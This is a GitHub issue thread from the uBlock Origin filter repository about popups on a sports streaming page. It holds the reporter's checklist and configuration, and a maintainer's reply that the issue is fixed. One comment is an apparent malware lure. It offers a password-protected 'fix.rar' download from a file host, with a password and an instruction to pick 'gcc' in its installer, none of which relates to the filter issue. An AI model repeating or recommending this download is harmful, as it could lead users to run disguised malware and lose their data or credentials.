### ISSUE TITLE
jokersportshd.org: popups

### ISSUE THREAD

**Issue by peroleucopus** [uBlockOrigin/uAssets#25056]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://jokersportshd.org/c9708a1d/34657b6f/794f20cf`

### Category

popups

### Description

Clicking on the page opens additional pages.

### Other extensions used

None

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Firefox: 129
filterset (summary):
 network: 247344
 cosmetic: 259861
 scriptlet: 54175
 html: 2191
listset (total-discarded, last-updated):
 added:
  adguard-generic: 84814-4144, 1h.45m
  adguard-mobile: 9659-60, 1h.45m
  adguard-spyware-url: 1662-124, 1h.45m
  adguard-spyware: 77765-1546, 1h.45m
  block-lan: 71-0, 1h.45m
  curben-phishing: 505-2, 1h.45m
  adguard-social: 23347-57, 1h.45m
  adguard-cookies: 31296-57, 1h.45m
  ublock-cookies-adguard: 1680-28, 1h.45m
  adguard-popup-overlays: 27877-1017, 1h.45m
  adguard-mobile-app-banners: 5422-27, 1h.45m
  adguard-other-annoyances: 14914-410, 1h.45m
  [11 lists not shown]: [too many]
 default:
  user-filters: 0-0, never
  ublock-filters: 39756-126, 1h.44m
  ublock-badware: 10750-6, 2m Δ
  ublock-privacy: 1065-4, 2m Δ
  ublock-unbreak: 2566-1, 2m Δ
  ublock-quick-fixes: 203-4, 2m Δ
  easylist: 85556-2574, 1h.45m
  easyprivacy: 53048-25566, 1h.45m
  urlhaus-1: 28500-0, 1h.45m
  plowe-0: 3545-1489, 1h.45m
filterset (user): [empty]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 1064 ms
 maxAssetCacheWait: 609 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 5
 network:
  acscdn.com: 2
  allsportsflix.xyz: 1
  amung.us: 2
 extended:
  ###ad_overlay
```
</details>

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mapx-** [comment]
fixed together with `tennis.stream`
